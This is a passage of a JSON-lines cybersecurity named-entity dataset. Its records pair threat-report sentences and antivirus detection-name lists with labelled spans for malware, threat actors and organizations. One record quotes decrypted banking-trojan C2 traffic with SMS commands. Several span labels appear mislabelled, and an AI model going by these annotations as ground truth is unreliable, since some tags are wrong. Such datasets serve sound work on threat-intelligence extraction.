Trojan/Win32.Xema.C2455 Trojan-Ransom.Cryakl Ransom.TeslaCrypt.OL Trojan.Cryakl! W32/Filecoder.EQ!tr Win32/Trojan.c28", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006525", "source": "cyner2_train"}} {"text": "A backdoor also known as: Dropped:Backdoor.Rootodor.H Backdoor.W32.SdBot.aop!c Backdoor/SdBot.aop Backdoor.Rootodor.H Backdoor.Sdbot Win.Trojan.SdBot-8443 Dropped:Backdoor.Rootodor.H Backdoor.Win32.SdBot.aop Dropped:Backdoor.Rootodor.H Trojan.Win32.SdBot.fptq Dropped:Backdoor.Rootodor.H Dropped:Backdoor.Rootodor.H BackDoor.Rtkit.12 Backdoor.SDBot BehavesLike.Win32.Downloader.dc Backdoor/SdBot.cr WORM/SdBot.298496.1 Win32.Hack.SdBot.kcloud TrojanDropper:Win32/Srvdrop.A Backdoor.Win32.SdBot.aop Dropped:Backdoor.Rootodor.H Backdoor.SDBot Backdoor.SdBot Win32.Backdoor.Sdbot.Wrgb Worm.SdBot!0ktHNidYgyk Backdoor.Win32.SdBot W32/SDBot.AOP!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006527", "source": "cyner2_train"}} {"text": "A backdoor also known as: Pua.Cpush W32/Trojan.VJJX-8459 not-a-virus:AdWare.Win32.Cpush.a Adware.Cpush.Win32.21 BehavesLike.Win32.Downloader.fc Trojan.Zusy.D2AB1B not-a-virus:AdWare.Win32.Cpush.a AdWare.Cpush Trj/CI.A Win32/VB.NYC Win32.Adware.Cpush.Dwjc Adware.Cpush!ybdhrKQu3UY Trojan-Dropper.Win32.VB W32/VB.NYC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006528", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.NSIS.Androm.7 Ransom.Onion.A Win32.Trojan.WisdomEyes.16070401.9500.9984 Packed.NSISPacker!g6 Ransom_.97182692 Trojan.NSIS.Androm.7 Trojan.Win32.Graftor.evkohe Trojan:W32/Gamarue.E Trojan.Inject2.64079 Ransom_.97182692 BehavesLike.Win32.Ransom.cc Trojan.Win32.Injector W32/Trojan.HJUO-7930 Trojan.Graftor.D6B214 Ransom.Cerber/Variant Ransom:Win32/Malasypt.A Trojan/Win32.Miuref.R183155 Trj/CI.A Trojan.Injector!s1rN7kKLdpI W32/Injector.DDGJ!tr Win32/Trojan.5c1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_006529", "source": "cyner2_train"}} {"text": "Vectra Threat Labs researchers have uncovered the activities of a group of individuals currently engaged in targeted attacks against entities in the Middle East.", "spans": {"ORGANIZATION: Vectra Threat Labs researchers": [[0, 30]], "THREAT_ACTOR: group of individuals": [[66, 86]]}, "info": {"id": "cyner2_train_006533", "source": "cyner2_train"}} {"text": "These websites, and the hosted programs, were designed to entice visitors to download and install the programs.", "spans": {}, "info": {"id": "cyner2_train_006534", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.DownLoader23.44275 Trojan.Graftor.D69D4B Trojan:Win32/Seepeed.A Trj/CI.A Win32.Trojan.Atraps.Pgmx W32/Kryptik.DNGA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006536", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PSW.Win32.QQPass!O Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Spyware.59892-2 Trojan-PSW.Win32.QQPass.sso Trojan.Win32.QQPass.bcshgi Trojan.Win32.Downloader.75264.M TrojWare.Win32.PSW.QQPass.~Sso Backdoor.PePatch.Win32.16970 Trojan[PSW]/Win32.QQPass Troj.PSW32.W.QQPass.toI3 Trojan-PSW.Win32.QQPass.sso PWS:Win32/Stealer.M", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006537", "source": "cyner2_train"}} {"text": "ESET detects the games that install the Trojan as Android/TrojanDropper.Mapin and the Trojan itself as Android/Mapin.", "spans": {"ORGANIZATION: ESET": [[0, 4]], "SYSTEM: games": [[17, 22]], "MALWARE: Trojan": [[40, 46], [86, 92]]}, "info": {"id": "cyner2_train_006542", "source": "cyner2_train"}} {"text": "Malware Seen In The Middle East Region Domains used by APT28.", "spans": {"MALWARE: Malware": [[0, 7]], "VULNERABILITY: Domains": [[39, 46]], "THREAT_ACTOR: APT28.": [[55, 61]]}, "info": {"id": "cyner2_train_006543", "source": "cyner2_train"}} {"text": "A backdoor also known 
as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Downloader-39183 Trojan.Win32.Dwn.whgnl Trojan.Win32.A.Downloader.28672.AMZ Trojan.DownLoader6.15686 BehavesLike.Win32.BadFile.mm Trojan[Downloader]/Win32.Tobor Trojan.Graftor.D45EB TrojanDownloader:Win32/Tobor.A TrojanDownloader.Tobor Win32/Trojan.e6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006544", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Graftor.Elzob.D2B30 BehavesLike.Win32.BadFile.qm HackTool:Win32/WMIShell.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006548", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Sefnit.Win32.13226 Trojan.Win32.Sefnit.ekkxqe Trojan.DownLoader23.50639 Trojan.Sefnit.pj Trojan/Win32.Sefnit TrojanDownloader:Win32/Trulop.A Trj/GdSda.A Win32/RA-based.NFG Trojan.Sefnit!apDWbcANJlc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006549", "source": "cyner2_train"}} {"text": "BankBot is a family of Trojan malware targeting Android devices that surfaced in the second half of 2016.", "spans": {"MALWARE: BankBot": [[0, 7]], "MALWARE: family of Trojan malware": [[13, 37]], "SYSTEM: Android devices": [[48, 63]]}, "info": {"id": "cyner2_train_006550", "source": "cyner2_train"}} {"text": "Let ’ s compare examples of traffic from Smaps and Asacub — an initializing request to the C & C server with information about the infected device and a response from the server with a command for execution : Smaps request Asacub request Decrypted data from Asacub traffic : { “ id ” : ” 532bf15a-b784-47e5-92fa-72198a2929f5″ , ” type ” : ” get ” , ” info ” : ” imei:365548770159066 , country : PL , cell : Tele2 , android:4.2.2 , model : GT-N5100 , phonenumber : +486679225120 , sim:6337076348906359089f , app : null , ver:5.0.2″ } Data sent to the server [ { “ command ” : ” sent & & & ” , ” params ” : { “ to ” : ” +79262000900″ , ” body ” : ” 
\\u0410\\u0412\\u0422\\u041e\\u041f\\u041b\\u0410\\u0422\\u0415\\u0416 1000 50″ , ” timestamp ” : ” 1452272572″ } } , { “ command ” : ” sent & & & ” , ” params ” : { “ to ” : ” +79262000900″ , ” body ” : ” BALANCE ” , ” timestamp ” : ” 1452272573″ } } ] Instructions received from the server A comparison can also be made of the format in which Asacub and Smaps forward incoming SMS ( encoded with the base64 algorithm ) from the device to the C & C server : Smaps format Asacub format Decrypted data from Asacub traffic : { “ data ” : ” 2015:10:14_02:41:15″ , ” id ” : ” 532bf15a-b784-47e5-92fa-72198a2929f5″ , ” text ” : ” SSB0aG91Z2h0IHdlIGdvdCBwYXN0IHRoaXMhISBJJ20gbm90IGh1bmdyeSBhbmQgbmU= ” , ” number ” : ” 1790″ , ” type ” : ” load ” } Propagation The banking Trojan is propagated via phishing SMS containing a link and an offer to view a photo or MMS .", "spans": {"MALWARE: Smaps": [[41, 46], [209, 214]], "MALWARE: Asacub": [[51, 57], [223, 229], [258, 264]]}, "info": {"id": "cyner2_train_006551", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9972 Infostealer.Tarno.B TrojWare.Win32.GhostDEL.~A Trojan.MulDrop4.8101 BehavesLike.Win32.Virut.qc Backdoor/Huigezi.2007.aqzf TrojanDownloader:Win32/Ksare.A Trj/CI.A Win32/Trojan.66a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006554", "source": "cyner2_train"}} {"text": "Recent weeks have seen the outing of two new additions to the Duke group's toolset, SeaDuke and CloudDuke.", "spans": {"THREAT_ACTOR: Duke group's": [[62, 74]], "MALWARE: SeaDuke": [[84, 91]], "MALWARE: CloudDuke.": [[96, 106]]}, "info": {"id": "cyner2_train_006555", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Graftor.D20DA2 TrojWare.Win32.TrojanDownloader.Delf.SAD BehavesLike.Win32.Dropper.dc TR/Dldr.Vifuls.pwiho TrojanDownloader:Win32/Vifuls.A TScope.Trojan.Delf Win32.Trojan.Badur.Eddg Win32/Trojan.fd8", "spans": {"MALWARE: backdoor": [[2, 10]]}, 
"info": {"id": "cyner2_train_006556", "source": "cyner2_train"}} {"text": "Several bots relied heavily, if not exclusively, on systems with weak and/or default passwords to spread.", "spans": {"MALWARE: bots": [[8, 12]], "SYSTEM: systems": [[52, 59]]}, "info": {"id": "cyner2_train_006557", "source": "cyner2_train"}} {"text": "In other words, the attack targeted organizations that design, build and support industrial solutions for critical infrastructure.", "spans": {"ORGANIZATION: organizations": [[36, 49]], "ORGANIZATION: industrial solutions": [[81, 101]], "SYSTEM: critical infrastructure.": [[106, 130]]}, "info": {"id": "cyner2_train_006559", "source": "cyner2_train"}} {"text": "While revisiting a Flokibot campaign that was targeting point of sale PoS systems in Brazil earlier this year, we discovered something interesting.", "spans": {"MALWARE: Flokibot": [[19, 27]], "THREAT_ACTOR: campaign": [[28, 36]], "SYSTEM: PoS systems": [[70, 81]]}, "info": {"id": "cyner2_train_006560", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Finfish.11008 Backdoor.Win32.Finfish!O Backdoor.Finfish.r6 Backdoor.Finfish.Win32.1 Backdoor.W32.Finfish.b!c Backdoor/Finfish.b Backdoor.Finfish!WTL5ZVLbFgg Backdoor.Finfish Win32/Belesak.D TROJ_FINSPY.A Backdoor.Win32.Finfish.b Trojan.Win32.Finfish.wbhuj Trojan.Win32.Z.Finfish.11008[h] Backdoor.Win32.Finfish.B Trojan:W32/FinSpy.B Trojan.NtRootKit.14434 TROJ_FINSPY.A W32/Backdoor.CLPB-2084 Backdoor/Finfish.a W32/Belesak.D Trojan:WinNT/Spinfy.A Backdoor.Finfish Backdoor.Win32.Finfish.b Win32.Backdoor.Finfish.Iso Backdoor.Win32.Finfish", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006561", "source": "cyner2_train"}} {"text": "But an investigation now suggests the attack was in fact carried out by a group of Russian hackers.", "spans": {"ORGANIZATION: group": [[74, 79]], "THREAT_ACTOR: Russian hackers.": [[83, 99]]}, "info": {"id": "cyner2_train_006562", "source": "cyner2_train"}} {"text": 
"A backdoor also known as: Worm.Win32.Luder!O Worm.Polkayam.A3 Worm.Luder Trojan/Spy.VB.nub TROJ_SPNR.15GB13 Backdoor.Trojan Win32/Tnega.VHcOIY TROJ_SPNR.15GB13 Win.Trojan.Luder-83 Trojan.Win32.Luder.crcdfm W32.W.WBNA.lJLh Worm.Luder.Win32.197 Worm/Luder.chm TR/Dynamer.dtc.9853 Worm/Win32.Luder Worm:Win32/Polkayam.A Worm/Win32.Luder.C169426 Worm.Luder Worm.Luder!PF0ilQ/gy98 Worm.Win32.Luder W32/Luder.BQPT!tr Win32/Trojan.cfc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006564", "source": "cyner2_train"}} {"text": "In this post we will show links to a recently publicized PoS malware campaign, and describe possible threat motivations behind this or other POS vendor exploitation campaign.", "spans": {"MALWARE: PoS malware": [[57, 68]], "THREAT_ACTOR: campaign,": [[69, 78]], "VULNERABILITY: POS vendor exploitation": [[141, 164]], "THREAT_ACTOR: campaign.": [[165, 174]]}, "info": {"id": "cyner2_train_006567", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Worm.TUD Trojan/W32.Hesv.372736.B Worm.Folxrun Win32.Worm.TUD Win32.Worm.TUD Win32.Trojan.VB.ja W32.Rasith Win32/Rasith.A TROJ_FSYSNA_FB120272.UVPM Win32.Worm.TUD Trojan.Win32.Hesv.bjrj Win32.Worm.TUD Trojan.Win32.Autoruner2.ewcqfg Troj.W32.Hesv!c Win32.Worm.TUD Win32.Worm.TUD Win32.HLLW.Autoruner2.29691 Trojan.Fsysna.Win32.4334 BehavesLike.Win32.Vesenlosow.fm Worm.Win32.Rasith W32/Trojan.SHGP-6241 Trojan/Fsysna.atg Trojan/Win32.Fsysna Worm:Win32/Folxrun.A Trojan/Win32.Injector.R167793 Trojan.Win32.Hesv.bjrj Trojan.Fsysna Trj/CI.A Win32.Trojan.Hesv.Lkdf Trojan.Fsysna! 
Win32/Worm.4c0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006569", "source": "cyner2_train"}} {"text": "Novetta has collected and shares within this report evidence that suggests multiple actors,", "spans": {"ORGANIZATION: Novetta": [[0, 7]]}, "info": {"id": "cyner2_train_006570", "source": "cyner2_train"}} {"text": "This botnet is responsible for the majority of Locky and Dridex activity.", "spans": {"MALWARE: botnet": [[5, 11]], "MALWARE: Locky": [[47, 52]], "MALWARE: Dridex": [[57, 63]]}, "info": {"id": "cyner2_train_006571", "source": "cyner2_train"}} {"text": "The tool has been used in global phishing attacks and its use has been implicated in a number of notable attacks.", "spans": {"MALWARE: tool": [[4, 8]]}, "info": {"id": "cyner2_train_006574", "source": "cyner2_train"}} {"text": "In this case I spent more time analyzing the campaign than I initially planned.", "spans": {}, "info": {"id": "cyner2_train_006575", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.9E06 Win32.Trojan.WisdomEyes.16070401.9500.9767 Spyware.Perfect Win32/Gamepass.QHH Trojan-Dropper.Win32.Dorgam.xfl Win32.TenThief.QQPsw_def.fvg Trojan.PWS.Wsgame.36114 BehavesLike.Win32.Ransomware.dc Trojan.Win32.QQpass TrojanSpy.FlyStudio.cx TR/QQpass.E.4 Trojan-Dropper.Win32.Dorgam.xfl Win32/PSW.QQPass.OHY Win32/Trojan.884", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006576", "source": "cyner2_train"}} {"text": "The malware waits for victims to open the Google Play store and then displays a fake html overlay page asking for credit card information.", "spans": {"MALWARE: malware": [[4, 11]], "SYSTEM: Google Play store": [[42, 59]]}, "info": {"id": "cyner2_train_006577", "source": "cyner2_train"}} {"text": "On July 14, FireEye researchers discovered attacks exploiting the Adobe Flash vulnerability CVE-2015-5122, just four days after Adobe released a patch.", "spans": {"ORGANIZATION: FireEye researchers": [[12, 31]], 
"VULNERABILITY: exploiting": [[51, 61]], "SYSTEM: Adobe Flash": [[66, 77]], "VULNERABILITY: vulnerability": [[78, 91]], "ORGANIZATION: Adobe": [[128, 133]]}, "info": {"id": "cyner2_train_006578", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dynamer.S239831 Trojan.RA.Win32.52 Trojan.Win32.Reconyc.ejtcsm BehavesLike.Win32.Dropper.vc TR/RemoteAdmin.romkw Trojan/Win32.Scar Trojan.Zusy.D258ED Trojan.Banload Trojan.Win32.ChePro", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006580", "source": "cyner2_train"}} {"text": "The source code appears to have been picked by one or more threat actors and was used to conduct DDoS attacks against Georgia in 2008.", "spans": {"THREAT_ACTOR: threat actors": [[59, 72]]}, "info": {"id": "cyner2_train_006581", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanAPT.Moudoor.A8 TROJ_BANLOAD.GDV Backdoor.Moudoor TROJ_BANLOAD.GDV Win.Trojan.Downloader-27596 Trojan.DownLoader6.13038 Trojan-Downloader.Win32.Banload W32/Trojan.MQRX-7833 W32.Malware.Heur Trojan[Downloader]/Win32.Unknown Win32.Troj.Undef.kcloud Trojan.Downloader.cmGfaSmx9Rpb TrojanDownloader:Win32/Moudoor.A Win-Trojan/Downloader.46592.GU Trojan.Downloader.46592 Win32/TrojanDownloader.Moudoor.A W32/Downloader_a.BWT!tr Win32/RootKit.Rootkit.7e5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006582", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.PWS.OnlineGames.KDPO TrojanPWS.Dozmot.D4 Infostealer.Gampass W32/Magania.GZ TROJ_GAMEHTI.SMI Trojan.Spy-73883 Trojan-GameThief.Win32.OnLineGames.bnkb Trojan.PWS.OnlineGames.KDPO Trojan.PWS.Magania!Tq/DAk7oVGo Virus.Win32.Part.a TrojWare.Win32.PSW.OnlineGames.~BNKB Trojan-PSW:W32/OnlineGames.UBO Trojan.PWS.Gamania.30052 TROJ_GAMEHTI.SMI Trojan-GameThief.Win32.WOW!IK Trojan/PSW.OnLineGames.bton Win32.PSWTroj.OnLineGames.kcloud PWS:Win32/Dozmot.D Trojan.Win32.PSWIGames.27176.E Trojan.PWS.OnlineGames.KDPO 
Trojan/Win32.OnlineGameHack BScope.Trojan.OnlineGames.0825 Trojan-PSW.Gampass Win32/PSW.WOW.NQS Trojan.Win32.FakeKsUsr.a Trojan-GameThief.Win32.WOW W32/Onlinegames.OST!tr.pws Trj/Lineage.LNC", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006583", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Bedep Trojan.Zusy.D3CF93 Backdoor.Win32.Bedep.lls Win32.Backdoor.Bedep.Lnob BDS/Bedep.ghjmg Trojan[Backdoor]/Win32.Bedep Backdoor.Win32.Bedep.lls Win-Trojan/Bmdoor.100864 Backdoor.Win32.Bedep", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006586", "source": "cyner2_train"}} {"text": "Tofsee is a multi-purpose malware with wide array of capabilities – it can mine bitcoins, send emails, steal credentials, perform DDoS attacks, and more.", "spans": {"MALWARE: Tofsee": [[0, 6]], "MALWARE: multi-purpose malware": [[12, 33]]}, "info": {"id": "cyner2_train_006587", "source": "cyner2_train"}} {"text": "These are detected within Alienvault USM by looking for Excel launching Cmd.exe.", "spans": {"ORGANIZATION: Alienvault USM": [[26, 40]]}, "info": {"id": "cyner2_train_006588", "source": "cyner2_train"}} {"text": "In that research we discussed two new malware families we named KASPERAGENT and MICROPSIA.", "spans": {"MALWARE: malware families": [[38, 54]], "MALWARE: KASPERAGENT": [[64, 75]], "MALWARE: MICROPSIA.": [[80, 90]]}, "info": {"id": "cyner2_train_006591", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.FakeAV Trojan.FakeSysDef.Win32.707 Trojan/Kryptik.ahre Win32.Trojan.WisdomEyes.16070401.9500.9999 TrojWare.Win32.Spy.Zbot.HEUB Trojan.DownLoader5.64514 BehavesLike.Win32.Downloader.dc Trojan/SmartFixer.gv W32.Trojan.Fakesysdef TR/FakeSysdef.aqwrb Trojan.Zbot.76 Trojan/Win32.FakeAV.R28472 FakeAlert-SysDef.ae TrojanFakeAV.FakeSysDef Trojan.Zbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006592", "source": "cyner2_train"}} {"text": "Taiwan has been a 
regular target of cyber espionage threat actors for a number of years.", "spans": {"THREAT_ACTOR: cyber espionage threat actors": [[36, 65]]}, "info": {"id": "cyner2_train_006593", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Nekozillot Win32.Trojan.WisdomEyes.16070401.9500.9656 Trojan.DownLoader25.61646 W32/Trojan.RZHM-5084 BDS/RedCap.gyswy Trojan.MSILPerseus.D21311 Backdoor:MSIL/Nekozillot.A!bit Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006596", "source": "cyner2_train"}} {"text": "It seems to be that the actors behind these campaigns are back now and launching again massive spam attacks.", "spans": {"THREAT_ACTOR: actors": [[24, 30]], "THREAT_ACTOR: campaigns": [[44, 53]]}, "info": {"id": "cyner2_train_006599", "source": "cyner2_train"}} {"text": "and launch the new activity as the payload.", "spans": {"MALWARE: payload.": [[35, 43]]}, "info": {"id": "cyner2_train_006601", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Quby.b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006602", "source": "cyner2_train"}} {"text": "So far, these campaigns have targeted countries including Germany, Austria, and the United Kingdom.", "spans": {"THREAT_ACTOR: campaigns": [[14, 23]]}, "info": {"id": "cyner2_train_006604", "source": "cyner2_train"}} {"text": "This includes,among others, Poland, Australia, United Kingdom and Spain.", "spans": {}, "info": {"id": "cyner2_train_006605", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Roron.F Worm.Roron.Win32.28 WORM_OROR.Q Win32.Trojan.WisdomEyes.16070401.9500.9941 W32/Roro.AA@mm W32.HLLW.Oror.C@mm Win32/Oror.U WORM_OROR.Q Win.Trojan.Oror-3 Trojan.Win32.IRCBot.dvpnyt W32.W.Envid.l6rk Win32.Backdoor.Ircbot.Lned Worm.Win32.Roron.51 Win32.HLLM.RoRo BehavesLike.Win32.Backdoor.cc W32/Roro.AA@mm Backdoor/IRCBot.rdt WORM/Roron.51 Worm[Email]/Win32.Roron Win32.Hack.IRCBot.g.kcloud 
I-Worm.Win32.Roron.82954 Worm:Win32/Roron.Z@mm Win32/Roron.worm.81925 Worm.Roron Win32/Roron.51 IRC.Roron.G Email-Worm.Win32.Roron W32/Roron.B!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006606", "source": "cyner2_train"}} {"text": "The Kaspersky Anti-Ransom team decrypted the Xpan Trojan, allowing them to rescue the files of a Hospital in Brazil that had fallen victim to this Ransomware family.", "spans": {"ORGANIZATION: The Kaspersky Anti-Ransom team": [[0, 30]], "MALWARE: Xpan Trojan,": [[45, 57]], "ORGANIZATION: Hospital": [[97, 105]], "MALWARE: Ransomware family.": [[147, 165]]}, "info": {"id": "cyner2_train_006607", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.DL.BHO.UDE W32/DLoader.AIYY Trojan.Downloader-70412 TrojWare.Win32.Bho.yme Trojan.Win32.Bho.yme Trojan.MulDrop.origin Heuristic.BehavesLike.Win32.Dropper.K TrojanDropper.Softfy.cn Trojan:Win32/Gedanjo.A Trojan-Downloader.Win32.BHO.lff Trojan.Clicker.Win32.Undef.mi", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006608", "source": "cyner2_train"}} {"text": "The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day CVE-2015-2590 in July 2015.", "spans": {"MALWARE: JHUHUGIT implant": [[4, 20]], "VULNERABILITY: Java zero-day": [[110, 123]]}, "info": {"id": "cyner2_train_006609", "source": "cyner2_train"}} {"text": "These spam campaigns feature a multi-stage infection chain including a PDF file, a malicious Microsoft Office document, and finally, the Jaff ransomware loader.", "spans": {"THREAT_ACTOR: spam campaigns": [[6, 20]], "MALWARE: the Jaff ransomware loader.": [[133, 160]]}, "info": {"id": "cyner2_train_006610", "source": "cyner2_train"}} {"text": "Indicators of the malware used in two bank heist against Tienphong Commercial Bank in Vietnam and the Bangladesh central bank.", "spans": {"MALWARE: malware": [[18, 25]], "ORGANIZATION: Tienphong Commercial 
Bank": [[57, 82]], "ORGANIZATION: the Bangladesh central bank.": [[98, 126]]}, "info": {"id": "cyner2_train_006611", "source": "cyner2_train"}} {"text": "A backdoor also known as: RiskWare.Tool.CK Win32.Trojan.WisdomEyes.16070401.9500.9947 Trojan.Win32.Clicker.8989 TrojWare.Win32.Patched.KSU Trojan.DownLoader.5848 BehavesLike.Win32.Ramnit.xc TR/Dldr.Hup.UH.15.B Win32.Troj.download.kcloud Trojan.Dropper/Packed", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006614", "source": "cyner2_train"}} {"text": "The delivery document also saved the post-exploitation credential harvesting tool known as Mimikatz, which we believe the threat actors will use to gather account credentials from the compromised system.", "spans": {"MALWARE: the post-exploitation credential harvesting tool": [[33, 81]], "MALWARE: Mimikatz,": [[91, 100]], "THREAT_ACTOR: the threat actors": [[118, 135]], "SYSTEM: the compromised system.": [[180, 203]]}, "info": {"id": "cyner2_train_006615", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Standardtest.17104 Win32.Trojan.WisdomEyes.16070401.9500.9983 Win32/Tnega.FJZCPHC Win.Trojan.Standardtest-1 Trojan.Win32.StandardTest.cthmar Win32.Trojan.Standardtest.Dvpy TrojWare.Win32.StandardTest.A Trojan.Win32.StandardTest TR/StandardTest.0 Trojan.Razy.D1D493 Trojan:Win32/StandardTest.0 Trojan/Win32.Kazy.C224799 Trojan.Kazy!M40EV8PiuTc Win32/Trojan.b42", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006616", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MalPack Ransom_Blocker.R011C0RB618 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.FakeAV Win.Trojan.Emotet-6441079-0 Trojan-Ransom.Win32.Blocker.krar Trojan.Win32.Encoder.exomzo Trojan.Win32.Z.Zusy.183296.BS TrojWare.Win32.Ransom.GandCrypt.A Trojan.Encoder.24475 BehavesLike.Win32.PWSZbot.cc Trojan.Win32.Crypt Trojan.Blocker.ier TR/Crypt.ZPACK.hwjhn Trojan.Zusy.D42FEC Trojan-Ransom.Win32.Blocker.krar 
TrojanProxy:Win32/Bunitu.Q!bit Trojan/Win32.Magniber.R219494 W32/Injector.DVHR!tr Win32/Trojan.ff4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006617", "source": "cyner2_train"}} {"text": "The FireEye as a Service team detected independent phishing campaigns conducted by two Chinese advanced persistent threat APT groups that we track, APT3 and APT18.", "spans": {"ORGANIZATION: FireEye": [[4, 11]], "ORGANIZATION: Service team": [[17, 29]], "THREAT_ACTOR: phishing campaigns": [[51, 69]], "THREAT_ACTOR: Chinese advanced persistent threat APT groups": [[87, 132]], "THREAT_ACTOR: APT3": [[148, 152]], "THREAT_ACTOR: APT18.": [[157, 163]]}, "info": {"id": "cyner2_train_006618", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.HllpHQc.Trojan Win32.HLLP.DeTroie.A HLLP.DeTroie Win32.HLLP.DeTroie.A Virus.DeTroie.Win32.8 W32/HLLP.DeTroie.a Win32.HLLP.DeTroie.A Win32.Worm.DeTroie.b W32/HLLP.Detroie.A W32.HLLP.DeTroie Win32/DeTroie.D WORM_DETROIE.A Win.Trojan.DeTroie-1 Virus.Win32.HLLP.DeTroie Win32.HLLP.DeTroie.A Virus.Win32.DeTroie.bbxbrd W32.HLLP.DeTroie.tnqA Virus.Win32.Hllp.aad Win32.HLLP.DeTroie.A Virus.Win32.HLLP.DeTroie.E Win32.HLLP.Cheval WORM_DETROIE.A BehavesLike.Win32.Cheval.tz W32/HLLP.Detroie.A Win32/HLLP.DeTroie W32.Hllp.Detroie Virus/Win32.HLLP.DeTroie Worm:Win32/Cheval.D Win32.Detroie.A Virus.Win32.HLLP.DeTroie Win32.HLLP.DeTroie.A Win32/HLLP.Detroie.D W32/Cheval.dr Virus.Win32.HLLP.DeTroie Win32/HLLP.DeTroie Win32.HLLP.DeTroie.C Virus.Win32.HLLP.DeTroie W95/HLLP.Detroie.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006621", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.E0AE Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Yakes.vphb Trojan.Win32.Yakes.exslpy Trojan.Encoder.3976 BehavesLike.Win32.Downloader.kc Trojan.Win32.Crypt Trojan.Yakes.yvz TR/Crypt.ZPACK.rwser Trojan.Win32.Yakes.vphb Trojan:Win32/Godzilia.B!bit Trj/GdSda.A 
W32/Kryptik.EYKI!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006623", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Spybot.Worm Win32.Stration Win32.HLLW.SpyBot Worm/Spyboter.44064 P2P-Worm.Win32.SpyBot.gl!IK P2P-Worm.Win32.SpyBot.eu", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006625", "source": "cyner2_train"}} {"text": "Visiting the main page hosted at www.president-office.gov[.]mm triggered the malicious content, as the threat actors injected an inline frame IFRAME into a JavaScript file used by Drupal for the site's theme.", "spans": {"MALWARE: malicious": [[77, 86]], "THREAT_ACTOR: threat actors": [[103, 116]], "ORGANIZATION: Drupal": [[180, 186]]}, "info": {"id": "cyner2_train_006627", "source": "cyner2_train"}} {"text": "This campaign started in April 2017, using a spear phishing campaign to deliver the MICROPSIA payload in order to remotely control infected systems.", "spans": {"THREAT_ACTOR: campaign": [[5, 13]], "THREAT_ACTOR: spear phishing campaign": [[45, 68]], "MALWARE: MICROPSIA payload": [[84, 101]], "SYSTEM: infected systems.": [[131, 148]]}, "info": {"id": "cyner2_train_006628", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OngameJFT.Trojan Application.Hacktool.CX Worm/W32.AutoRun.11656 RiskTool.Win32.Tcpz!O Risktool.Tcpz W32/AutoRun.ezt W32/Spybot.QYN Hacktool.Rootkit Win32/Tcpz.A Win.Trojan.B-285 Application.Hacktool.CX 